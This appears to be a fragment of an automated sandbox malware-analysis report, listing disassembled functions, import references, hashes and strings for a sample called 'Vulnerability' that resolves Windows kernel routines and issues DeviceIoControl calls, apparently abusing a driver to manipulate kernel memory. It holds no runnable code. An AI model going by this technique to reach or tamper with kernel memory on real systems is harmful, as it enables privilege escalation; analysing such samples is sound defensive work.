                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC416F50
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                                                          • String ID: ExAcquireResourceExclusiveLite$[!] Failed to find ExAcquireResourceExclusiveLite
                                                                                          • API String ID: 4162525100-2131800721
                                                                                          • Opcode ID: ec0f3fe029cf7c9f33ae343079c5c42bfb77fe7d126f801541ca4cd5903061d2
                                                                                          • Instruction ID: b90cca032eff3f27cfdea7894a7e36905e71ab77d1ecc8e32440af39fba9e2c3
                                                                                          • Opcode Fuzzy Hash: ec0f3fe029cf7c9f33ae343079c5c42bfb77fe7d126f801541ca4cd5903061d2
                                                                                          • Instruction Fuzzy Hash: 1E3183A1E18AC651FA00EF24E4413B5EB61EF957B8FD0D131E55D426E5DE2CE6C1C720
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4161CE
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41618E
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                                                          • String ID: MmUnmapLockedPages$[!] Failed to find MmUnmapLockedPages
                                                                                          • API String ID: 4162525100-2848997145
                                                                                          • Opcode ID: 5957dede2b94ffe6d6d190a53612df9ae534eee6e8a7d16cd070dc35db71c8f9
                                                                                          • Instruction ID: a51711faa31b62103e937e55f65331d849598d0211608adaf373674ceea21209
                                                                                          • Opcode Fuzzy Hash: 5957dede2b94ffe6d6d190a53612df9ae534eee6e8a7d16cd070dc35db71c8f9
                                                                                          • Instruction Fuzzy Hash: 4C317662E18AC641EA00EF25E4412B9E761FFC57F8FD0D231E59D026A6DE2CE685C710
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC416422
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC4163E0
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                                                          • String ID: ExFreePool$[!] Failed to find ExAllocatePool
                                                                                          • API String ID: 4162525100-3091510598
                                                                                          • Opcode ID: 2725559fb159c936bb926d091b9f3f1744b5b68ea279b61c567f4bb089d1663f
                                                                                          • Instruction ID: 3a2d132e508b6a33020ec60275431758fefe7c0f133f600f95f77e9f6b1c5ea8
                                                                                          • Opcode Fuzzy Hash: 2725559fb159c936bb926d091b9f3f1744b5b68ea279b61c567f4bb089d1663f
                                                                                          • Instruction Fuzzy Hash: 2A21A4A2E186C681E910EF15E4411B89B61FF857F8FD0D235D99D426E5DF2CE781C320
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4162F7
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC4162B7
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                                                          • String ID: MmFreePagesFromMdl$[!] Failed to find MmFreePagesFromMdl
                                                                                          • API String ID: 4162525100-1029121595
                                                                                          • Opcode ID: fa1bedc95faaa97df07f08ef03e503c10e7a9ee885c7fc475780664ac9344abc
                                                                                          • Instruction ID: 17106510d99ee2b98890dd3341e84e9a70c1d199849c27dd4a6bb99c99f45c79
                                                                                          • Opcode Fuzzy Hash: fa1bedc95faaa97df07f08ef03e503c10e7a9ee885c7fc475780664ac9344abc
                                                                                          • Instruction Fuzzy Hash: BE218461E18AC641EA00FF25E8412B5AB61FF857F8FD09231D59D426E5DF2CE285C620
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC417B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417B4D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41606C
                                                                                          Similarity
                                                                                          • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?good@ios_base@std@@U?$char_traits@_V01@@W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                                                          • String ID: PAGE$[!] Failed to find MmFreeIndependentPages$xxxxxxxxx????xxxxxxx
                                                                                          • API String ID: 310790477-3730907401
                                                                                          • Opcode ID: 7c3e515ba8e34546da29bc7205f4d0ecbc687ab8c70488897c40de058f702fc7
                                                                                          • Instruction ID: 8539d8dbea4d10b0018f83ed20f044680f5daff1aabb208aa11dbd3f59cb836a
                                                                                          • Opcode Fuzzy Hash: 7c3e515ba8e34546da29bc7205f4d0ecbc687ab8c70488897c40de058f702fc7
                                                                                          • Instruction Fuzzy Hash: 79210E71A18B8291EA10EF14F4413A5ABA1FB857ACF948435EA8C07656DF3DE685C720
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                          • String ID:
                                                                                          • API String ID: 2138705365-0
                                                                                          • Opcode ID: fc289f166b6b73dbb56ea0f1b2d87eea9c67c078dcf9b96923d52efb0a85c74e
                                                                                          • Instruction ID: d6ba4173ed278d2ec27bb0d2b533473a01403a96be6a7688d888bff66f7cc027
                                                                                          • Opcode Fuzzy Hash: fc289f166b6b73dbb56ea0f1b2d87eea9c67c078dcf9b96923d52efb0a85c74e
                                                                                          • Instruction Fuzzy Hash: D7819E72A04AC191EB04EF29E4853ACA775EB44F9CF908032DA4D47A69EF79DAD4C340
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41F604
                                                                                            • Part of subcall function 00007FF7CC41CD60: memmove.VCRUNTIME140 ref: 00007FF7CC41CE27
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41F749
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41F750
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41F757
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$memmove
                                                                                          • String ID:
                                                                                          • API String ID: 15630516-0
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,00000000,?,?,?,00007FF7CC41F41B), ref: 00007FF7CC41FB34
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • memmove.VCRUNTIME140(?,?,00000000,?,?,?,00007FF7CC41F41B), ref: 00007FF7CC41FB21
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,?,00007FF7CC41F41B), ref: 00007FF7CC41FBCE
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41FBDB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2075926362-0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,?,00007FF7CC4236C9), ref: 00007FF7CC4237D3
                                                                                          • memmove.VCRUNTIME140(?,?,?,00007FF7CC4236C9), ref: 00007FF7CC4237E6
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7CC4236C9), ref: 00007FF7CC42384C
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC423859
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2075926362-0
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,00000000,?,?,00007FF7CC420D50), ref: 00007FF7CC4226FB
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,00007FF7CC420D50), ref: 00007FF7CC42272F
                                                                                          • memmove.VCRUNTIME140(?,?,00000000,?,?,00007FF7CC420D50), ref: 00007FF7CC422739
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC422762
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2016347663-0
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C8F3
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC41A24A), ref: 00007FF7CC41C9B9
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41C9DD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task
                                                                                          • String ID:
                                                                                          • API String ID: 1247048853-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 2016347663-0
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41D342
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • memmove.VCRUNTIME140 ref: 00007FF7CC41D373
                                                                                          • memmove.VCRUNTIME140 ref: 00007FF7CC41D383
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41D3A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2075926362-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task
                                                                                          • String ID:
                                                                                          • API String ID: 1247048853-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharErrorLastMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 203985260-0